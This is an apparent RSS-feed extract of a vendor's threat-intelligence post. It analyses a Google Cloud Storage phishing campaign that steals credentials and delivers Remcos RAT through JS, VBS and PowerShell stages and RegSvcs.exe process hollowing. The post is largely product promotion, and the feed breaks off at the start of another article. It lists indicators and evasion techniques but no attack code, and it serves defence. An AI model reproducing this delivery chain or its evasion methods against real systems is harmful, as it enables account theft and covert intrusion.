<p>The attackers&nbsp;parked&nbsp;their phishing pages on a legitimate,&nbsp;widely-trusted&nbsp;Google domain. This single architectural choice allowed the campaign to bypass a wide range of conventional email security gateways and web filtering tools.&nbsp;<br>&nbsp;<br>Convincing Google Drive-themed phishing pages are hosted on storage.googleapis.com subdomains such as pa-bids, com-bid, contract-bid-0, in-bids, and out-bid. Examples include URLs like&nbsp;hxxps://storage[.]googleapis[.]com/com-bid/GoogleDrive.html. These pages mimic legitimate Google Workspace sign-in flows, complete with branded logos, file-type icons (PDF, DOC, SHEET, SLIDE), and prompts to “<em>Sign in to view document in Google Drive</em>.”&nbsp;<br>&nbsp;<br>The pages are crafted to harvest full account credentials: email address, password, and one-time passcode. But&nbsp;the credential&nbsp;theft is just the opening act.&nbsp;After&nbsp;a&nbsp;“successful login,” the page prompts the download of a file named Bid-Packet-INV-Document.js, which serves as the entry point for the malware delivery chain.&nbsp;</p>



<h3 class="wp-block-heading">Attack Chain&nbsp;</h3>



<p>The delivery chain is deliberately complex and layered to evade detection at every stage:&nbsp;</p>



<p><strong>1. Phishing Email Delivery</strong>.&nbsp;Because the sending domain and the linked domain are both associated with legitimate Google infrastructure, the email passes standard DMARC, SPF, and DKIM authentication checks, and is not flagged by reputation-based email filters.&nbsp;</p>



<p><strong>2. Fake Google Drive Login Page</strong>.&nbsp;The googleapis.com link opens a convincing replica of the Google Drive interface, prompting the victim to authenticate with their email address, password, and one-time passcode. Credentials entered here are captured and exfiltrated to the attacker&#8217;s command-and-control infrastructure.&nbsp;</p>



<p><strong>3.&nbsp;Malicious JavaScript Download</strong>. The victim is prompted to download Bid-Packet-INV-Document.js, presented as a business document. When executed under Windows Script Host, this JavaScript file&nbsp;contains&nbsp;time-based evasion logic — it can delay execution to avoid sandbox detection environments that analyze behavior within a fixed time window.&nbsp;</p>



<p><strong>4.&nbsp;VBS Chain and Persistence</strong>.&nbsp;The JavaScript launches a first VBS stage, which downloads and silently executes a second VBS file. This second stage drops components into %APPDATA%\WindowsUpdate&nbsp;(folder name chosen to blend in with legitimate Windows processes)&nbsp;and configures Startup persistence, ensuring the malware survives system reboots.&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="714" height="798" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_3.png" alt="" class="wp-image-20006" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_3.png 714w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_3-268x300.png 268w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_3-370x414.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_3-270x302.png 270w" sizes="(max-width: 714px) 100vw, 714px" /><figcaption class="wp-element-caption"><em>Malicious script activity captured by the sandbox</em>&nbsp;</figcaption></figure>



<p><strong>5.&nbsp;PowerShell Orchestration</strong>.&nbsp;A PowerShell script (DYHVQ.ps1) then orchestrates the loading of an obfuscated portable executable stored as&nbsp;ZIFDG.tmp, which&nbsp;contains&nbsp;the&nbsp;Remcos&nbsp;RAT payload. To remain stealthy, the chain simultaneously fetches an&nbsp;additional&nbsp;obfuscated .NET loader from&nbsp;Textbin, a text-hosting service,&nbsp;loading it directly in memory via&nbsp;Assembly.Load, leaving no file on disk for traditional antivirus engines to scan.&nbsp;</p>



<p><strong>6.&nbsp;Process Hollowing via RegSvcs.exe</strong>.&nbsp;The .NET loader abuses RegSvcs.exe&nbsp;for&nbsp;process hollowing. Because RegSvcs.exe is signed by Microsoft and carries a clean reputation on&nbsp;VirusTotal, its execution&nbsp;appears&nbsp;benign in endpoint logs. The loader creates or starts RegSvcs.exe from %TEMP%, hollowing the process and injecting the&nbsp;Remcos&nbsp;payload into its memory space. The result is a partially fileless&nbsp;Remcos&nbsp;instance: most of the malicious logic executes entirely in memory, never touching the disk in a form that a signature-based scanner would recognize.&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="709" height="825" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_4.png" alt="" class="wp-image-20009" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_4.png 709w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_4-258x300.png 258w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_4-370x431.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_4-270x314.png 270w" sizes="(max-width: 709px) 100vw, 709px" /><figcaption class="wp-element-caption"><em>Remcos&nbsp;RAT detected in the sandbox analysis</em></figcaption></figure>



<p><strong>7.&nbsp;C2 Establishment</strong>.&nbsp;Remcos&nbsp;establishes an encrypted communication channel back to the attacker&#8217;s command-and-control server and writes persistence entries into the Windows Registry under HKEY_CURRENT_USER\Software\Remcos-{ID}, ensuring continued access across reboots. From this point, the attacker has full, persistent, covert control over the compromised endpoint.&nbsp;&nbsp;</p>



<p><a href="https://any.run/features/?utm_source=mtt&amp;utm_medium=article&amp;utm_campaign=phishing-google-drive-remcos&amp;utm_term=140426&amp;utm_content=linktosandboxanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s sandbox</a>&nbsp;analysis clearly visualizes this chain: wscript.exe spawns multiple VBS and JS scripts, cmd.exe and powershell.exe handle staging, and RegSvcs.exe is flagged for&nbsp;Remcos&nbsp;behavior. The entire process tree&nbsp;demonstrates&nbsp;how attackers chain living-off-the-land binaries (LOLBins) with obfuscation and in-memory execution.&nbsp;</p>



<h2 class="wp-block-heading">Why This Attack Works — and Why&nbsp;Remcos&nbsp;Makes It So Dangerous&nbsp;</h2>



<p>The attack succeeds because it weaponizes trust&nbsp;at&nbsp;every layer. Google Storage provides reputation immunity. RegSvcs.exe is a signed Microsoft binary used for .NET service installation: its clean hash means endpoint protection rarely flags it. Combined with heavy obfuscation, time-based evasion, and fileless techniques, the campaign slips past static analysis and many EDR rules that rely on file reputation or known malicious domains.&nbsp;</p>



<p>At the heart of the final payload is&nbsp;<a href="https://any.run/malware-trends/remcos/" target="_blank" rel="noreferrer noopener">Remcos RAT</a>&nbsp;— a commercially available Remote Access Trojan that has become a favorite among cybercriminals due to its affordability, ease of use, and powerful feature set.&nbsp;It&nbsp;grants attackers full remote control over the compromised system. Capabilities include keylogging, credential harvesting from browsers and password managers, screenshot capture, file upload/download, remote command execution, microphone and webcam access, and clipboard monitoring. It supports persistence mechanisms, anti-analysis tricks, and encrypted C2 communication.&nbsp;</p>



<p>The dangers of&nbsp;Remcos&nbsp;extend far beyond&nbsp;initial&nbsp;access. It serves as a beachhead for further attacks: ransomware deployment, lateral movement across the corporate network, data exfiltration of intellectual property or customer records, and even supply-chain compromise if the infected machine belongs to a vendor. Because it runs in memory inside a trusted process, it can remain undetected for weeks or months, silently harvesting sensitive data.&nbsp;</p>



<h2 class="wp-block-heading">Why&nbsp;This&nbsp;Matters for&nbsp;Businesses&nbsp;</h2>



<p>Enterprises face amplified risk because these campaigns target high-value users&nbsp;(executives, finance teams, and procurement staff)&nbsp;who routinely handle sensitive documents and have elevated privileges. A single successful infection can lead to:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Data Breaches and Regulatory Fines</strong>: Stolen credentials and exfiltrated files can trigger GDPR, CCPA, or industry-specific compliance violations costing millions.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Financial Losses</strong>: Direct wire fraud from compromised email accounts or indirect losses from ransomware.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Operational Disruption</strong>: Lateral movement can encrypt servers or exfiltrate intellectual property, halting&nbsp;production&nbsp;or R&amp;D.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Reputation Damage</strong>: Clients and partners lose trust when a breach is publicly&nbsp;disclosed.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Supply-Chain Ripple Effects</strong>: If a&nbsp;vendor’s&nbsp;system is compromised via this vector, attackers can pivot into larger organizations.&nbsp;</li>
</ul>



<p>In attacks that exploit legitimate services, the Mean Time to Detect (<a href="https://any.run/cybersecurity-blog/reduce-mttd-with-ti-feeds/" target="_blank" rel="noreferrer noopener">MTTD</a>) for conventional security tools is dramatically extended. When the&nbsp;initial&nbsp;link is clean, the host domain is trusted, and the payload runs inside a legitimate Microsoft process, the&nbsp;alert chain that&nbsp;<a href="https://any.run/cybersecurity-blog/60-seconds-phishing-analysis/" target="_blank" rel="noreferrer noopener">SOC teams</a>&nbsp;depend on generates few or no signals. The attacker&nbsp;operates&nbsp;in silence while gathering intelligence, escalating privileges, and expanding their foothold.&nbsp;</p>



<h2 class="wp-block-heading">Enabling Proactive Protection Against Trust-Abuse Phishing&nbsp;</h2>



<p>Defending against phishing campaigns that abuse legitimate services requires a security capability that&nbsp;operates&nbsp;at the behavioral level — one that can&nbsp;observe&nbsp;what happens after a link is clicked or a file is opened, not just assess whether a URL or hash matches a known-bad list.&nbsp;<a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-google-drive-remcos&amp;utm_term=140426&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">ANY.RUN&#8217;s Enterprise Suite</a>&nbsp;is&nbsp;built precisely for this purpose, and its three core modules address the threat at complementary stages of the detection and response lifecycle.&nbsp;</p>



<h3 class="wp-block-heading">Triage &amp; Response: See the Full Kill Chain Before It Reaches Production&nbsp;</h3>



<p>The foundation of ANY.RUN&#8217;s detection capability is its&nbsp;<a href="https://any.run/features/?utm_source=mtt&amp;utm_medium=article&amp;utm_campaign=phishing-google-drive-remcos&amp;utm_term=140426&amp;utm_content=linktosandboxanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>: a cloud-based, fully interactive analysis environment that allows security analysts to safely detonate suspicious files and URLs in real time. Unlike automated sandboxes that analyze behavior passively within a fixed time window, ANY.RUN&#8217;s sandbox supports genuine human interaction: analysts can click, type, scroll, and navigate within the isolated virtual machine, triggering behavior that might be blocked by time-delay evasion or anti-automation logic.&nbsp;</p>



<p>In the Google Cloud Storage /&nbsp;Remcos&nbsp;campaign, this capability is decisive. The malicious JavaScript embedded time-based evasion logic is&nbsp;a mechanism designed specifically to defeat automated sandbox analysis. An interactive sandbox can wait out that delay, manually trigger the next stage, and&nbsp;observe&nbsp;the complete execution chain from the&nbsp;initial&nbsp;JS download through the VBS stages, the PowerShell orchestration, the process hollowing via RegSvcs.exe, and the final&nbsp;Remcos&nbsp;C2 callback.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight"> Reduce </span> the risk of delayed detection
<br>Help your team <span class="highlight">investigate faster</span>  and respond earlier
&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=phishing-google-drive-remcos&#038;utm_term=140426&#038;utm_content=linktoregistration" rel="noopener" target="_blank">
Power up your SOC
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>The result is not just a verdict but a full behavioral map: every process spawned, every network connection&nbsp;initiated, every registry key written, every file dropped. This map translates directly into actionable detection logic —&nbsp;<a href="https://any.run/cybersecurity-blog/mitre-ttps-in-ti-lookup/" target="_blank" rel="noreferrer noopener">MITRE ATT&amp;CK-mapped TTPs</a>,&nbsp;<a href="https://any.run/cybersecurity-blog/ai-sigma-rules/" target="_blank" rel="noreferrer noopener">Sigma rules</a>&nbsp;that can be deployed to SIEM and EDR platforms, and concrete IOCs that can be operationalized across the security stack.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="676" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_5-1024x676.png" alt="" class="wp-image-20013" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_5-1024x676.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_5-300x198.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_5-768x507.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_5-370x244.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_5-270x178.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_5-740x488.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_5.png 1159w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>MITRE ATT&amp;CK matrix of the attack analyzed in the sandbox</em></figcaption></figure>



<p>For SOC teams, this means the difference between seeing an alert that says &#8216;suspicious JavaScript file&#8217; and understanding the complete threat: this is&nbsp;Remcos&nbsp;RAT, delivered via process hollowing, with these C2 addresses, using these persistence mechanisms, and these are the detection rules that will catch the next variant.&nbsp;</p>



<h3 class="wp-block-heading">Threat&nbsp;Hunting: Enrich, Pivot, and Hunt Proactively&nbsp;</h3>



<p>ANY.RUN&#8217;s&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-google-drive-remcos&amp;utm_term=140426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>&nbsp;is a searchable, continuously updated database of threat intelligence drawn from real-time malware analysis conducted by a community of over 600,000 cybersecurity professionals and 15,000 organizations worldwide. It functions as a force multiplier for&nbsp;<a href="https://any.run/cybersecurity-blog/cyber-threat-hunting-tips/" target="_blank" rel="noreferrer noopener">threat hunting</a>&nbsp;and incident response, providing instant enrichment for any indicator — IP address, domain, file hash, URL, or behavioral signature.&nbsp;</p>



<p>In the context of the Google Cloud Storage /&nbsp;Remcos&nbsp;campaign, Threat Intelligence Lookup enables analysts to move rapidly from a single observed indicator to a comprehensive understanding of the campaign&#8217;s scope. A C2 IP address flagged by sandbox analysis can be pivoted to reveal all associated&nbsp;Remcos&nbsp;samples in the&nbsp;database, the infrastructure pattern used across the campaign, related file hashes, and behavioral indicators that might be present in other systems.&nbsp;</p>



<p><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-google-drive-remcos&amp;utm_term=140426&amp;utm_content=linktolookup/#%7B%2522query%2522:%2522destinationIP:%255C%2522198.187.29.19%255C%2522%2522,%2522dateRange%2522:180%7D" target="_blank" rel="noreferrer noopener">destinationIP:&#8221;198.187.29.19&#8243;</a>&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_6-1024x576.png" alt="" class="wp-image-20014" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_6-1024x576.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_6-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_6-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_6-1536x865.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_6-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_6-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_6-740x417.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_6.png 1556w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Domain associated with Google Cloud Storage/Remcos&nbsp;campaign in TI Lookup</em>&nbsp;</figcaption></figure>



<p>This pivoting capability is particularly valuable for detecting multi-stage attacks where the initial indicators are clean (a googleapis.com URL, a signed Microsoft binary) but later-stage indicators — C2 domains, specific PowerShell script signatures, anomalous RegSvcs.exe activity — can be correlated against historical data to confirm campaign attribution and expand detection coverage.&nbsp;</p>



<p>For threat hunters, Threat Intelligence Lookup supports proactive campaign identification before an organization is impacted.&nbsp;<a href="https://intelligence.any.run/analysis/yara?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-google-drive-remcos&amp;utm_term=140426&amp;utm_content=linktolookup" target="_blank" rel="noreferrer noopener">YARA-based searches</a>, combined with industry and geography filters,&nbsp;allow&nbsp;security teams to&nbsp;identify whether active campaigns are targeting their specific sector and region and to build detection rules based on real-world attacker behavior rather than theoretical models.&nbsp;</p>



<h3 class="wp-block-heading">Monitoring: Automated, Continuous, Real-World Coverage&nbsp;</h3>



<p>ANY.RUN&#8217;s&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-google-drive-remcos&amp;utm_term=140426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>&nbsp;deliver&nbsp;a continuous stream of fresh, verified malicious indicators directly into an organization&#8217;s security infrastructure — SIEM, SOAR, TIP, XDR — via STIX/TAXII and API/SDK&nbsp;<a href="https://any.run/integrations/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-google-drive-remcos&amp;utm_term=140426&amp;utm_content=linktointegrations" target="_blank" rel="noreferrer noopener">integrations</a>. These feeds are generated from live sandbox analysis across the ANY.RUN community, meaning they reflect actual attacker behavior&nbsp;observed&nbsp;in real-world campaigns, not synthetic or retrospectively compiled threat data.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="463" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_7-1024x463.png" alt="" class="wp-image-20017" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_7-1024x463.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_7-300x136.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_7-768x348.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_7-370x167.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_7-270x122.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_7-740x335.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_7.png 1467w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Feeds benefits and integrations</em></figcaption></figure>



<p>A critical differentiator is the uniqueness rate: ANY.RUN reports that 99% of indicators in its feeds are unique to the platform,&nbsp;not duplicated from public threat intel sources.&nbsp;The feeds also dramatically reduce Tier 1 analyst workload by providing malicious-only alerts with full behavioral context, cutting through the alert fatigue that plagues security operations teams dealing with high volumes of false positives from tools that cannot distinguish between legitimate googleapis.com traffic and the specific pattern of googleapis.com traffic used in this campaign.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">99% unique </span> threat intel for your SOC
<br>Catch threats early. Act with <span class="highlight">clear evidence.</span>
&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=phishing-google-drive-remcos&#038;utm_term=140426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Power your SOC now
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Conclusion&nbsp;</h2>



<p>The Google Storage phishing campaign delivering&nbsp;Remcos&nbsp;RAT is a wake-up call. As attackers continue to abuse trusted cloud services and legitimate binaries, organizations can no longer rely on reputation or signatures alone. Early detection through behavioral analysis and proactive threat intelligence is no longer optional — it is essential for survival.&nbsp;</p>



<p>By&nbsp;leveraging&nbsp;<a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-google-drive-remcos&amp;utm_term=140426&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">ANY.RUN’s Enterprise Suite</a>, security leaders can stay ahead of these evolving threats, protect critical assets, and&nbsp;maintain&nbsp;business continuity in an increasingly hostile digital landscape. The time to strengthen defenses is now — before the next bid document lands in your inbox.&nbsp;</p>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;&nbsp;</h2>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.&nbsp;&nbsp;</p>



<p>It allows teams to safely execute suspicious files and URLs,&nbsp;observe&nbsp;real behavior in an&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, enrich indicators with immediate context through&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>, and&nbsp;monitor&nbsp;emerging malicious infrastructure using&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.&nbsp;&nbsp;</p>



<p>ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II certified</a>,&nbsp;demonstrating&nbsp;its commitment to protecting customer data and&nbsp;maintaining&nbsp;strong security controls.&nbsp;</p>



<h2 class="wp-block-heading">FAQ</h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1776161852940"><strong class="schema-faq-question">What makes this Google Storage phishing campaign different from traditional attacks?</strong> <p class="schema-faq-answer">It hosts the phishing page on legitimate storage.googleapis.com domains instead of suspicious new sites, bypassing URL reputation filters entirely.</p> </div> <div class="schema-faq-section" id="faq-question-1776164580742"><strong class="schema-faq-question">How does the attack ultimately deliver Remcos RAT?</strong> <p class="schema-faq-answer">Through a layered chain of JS, VBS, PowerShell, and in-memory loading that culminates in process hollowing of the trusted RegSvcs.exe binary.</p> </div> <div class="schema-faq-section" id="faq-question-1776164588178"><strong class="schema-faq-question">Why is RegSvcs.exe particularly dangerous in this context?</strong> <p class="schema-faq-answer">It is a signed Microsoft .NET binary with a clean VirusTotal reputation, allowing attackers to inject the Remcos payload without triggering file-based alerts.</p> </div> <div class="schema-faq-section" id="faq-question-1776164599634"><strong class="schema-faq-question">What capabilities does Remcos RAT provide to attackers?</strong> <p class="schema-faq-answer">Full remote access, keylogging, credential theft, file exfiltration, screenshot capture, and persistence — all while running inside legitimate processes.</p> </div> <div class="schema-faq-section" id="faq-question-1776164614153"><strong class="schema-faq-question">How can ANY.RUN’s sandbox help my team detect similar threats?</strong> <p class="schema-faq-answer">It detonates suspicious files/URLs in a safe environment, reveals the complete behavioral chain, and provides IOCs and process trees for immediate response.</p> </div> <div class="schema-faq-section" id="faq-question-1776164624442"><strong class="schema-faq-question">What should businesses do immediately to protect against these attacks?</strong> <p class="schema-faq-answer">Enable behavioral analysis tools, integrate real-time threat intelligence feeds, train staff on cloud-storage lures, and test suspicious links in an interactive sandbox before opening.</p> </div> </div>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/phishing-google-drive-remcos/">When Trust Becomes a Weapon: Google Cloud Storage Phishing Deploying Remcos RAT</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/phishing-google-drive-remcos/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How Phishing Is Targeting Germany’s Economy: Active Threats from Finance to Manufacturing</title>
		<link>https://any.run/cybersecurity-blog/german-industries-attack-cases/</link>
					<comments>https://any.run/cybersecurity-blog/german-industries-attack-cases/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 09 Apr 2026 11:52:30 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Germany]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware behavior]]></category>
		<category><![CDATA[phishing]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=19906</guid>

					<description><![CDATA[<p>Germany’s economy is a precision machine: finance fuels it, manufacturing builds it, telecom connects it, IT&#160;optimizes&#160;it, and healthcare sustains it.&#160;The country sits at the crossroads of industrial power and digital transformation, making it irresistibly attractive to attackers. In this article, we explore real-world attacks targeting five critical German industries, analyzed by ANY.RUN’s analysts using Interactive [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/german-industries-attack-cases/">How Phishing Is Targeting Germany’s Economy: Active Threats from Finance to Manufacturing</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Germany’s economy is a precision machine: finance fuels it, manufacturing builds it, telecom connects it, IT&nbsp;optimizes&nbsp;it, and healthcare sustains it.&nbsp;The country sits at the crossroads of industrial power and digital transformation, making it irresistibly attractive to attackers.</p>



<p>In this article, we explore real-world attacks targeting five critical German industries, analyzed by ANY.RUN’s analysts using <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> and <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>. Each case is not theory. It is a live wire, recently observed, carefully dissected. </p>



<h2 class="wp-block-heading">Executive Summary&nbsp;</h2>



<ul class="wp-block-list">
<li><strong>Germany’s top industries are under coordinated pressure</strong>, not isolated attacks.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Identity is the new perimeter</strong>: attackers are bypassing infrastructure defenses by hijacking sessions and abusing legitimate authentication flows.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Phishing has evolved into real-time session interception</strong>,&nbsp;rendering&nbsp;traditional MFA insufficient on its own.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Attackers adapt lures to business context</strong>, increasing success rates against employees.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat intelligence</strong></a><strong>&nbsp;is no longer optional</strong>: it is critical for reducing detection time, preventing escalation, and protecting revenue&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Germany’s Digital Landscape: A High-Value Target&nbsp;</h2>



<p><strong>Why Germany?</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Largest economy in Europe with strong global&nbsp;ties;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Highly digitized enterprise&nbsp;sector;&nbsp;</li>
</ul>



<ul class="wp-block-list">
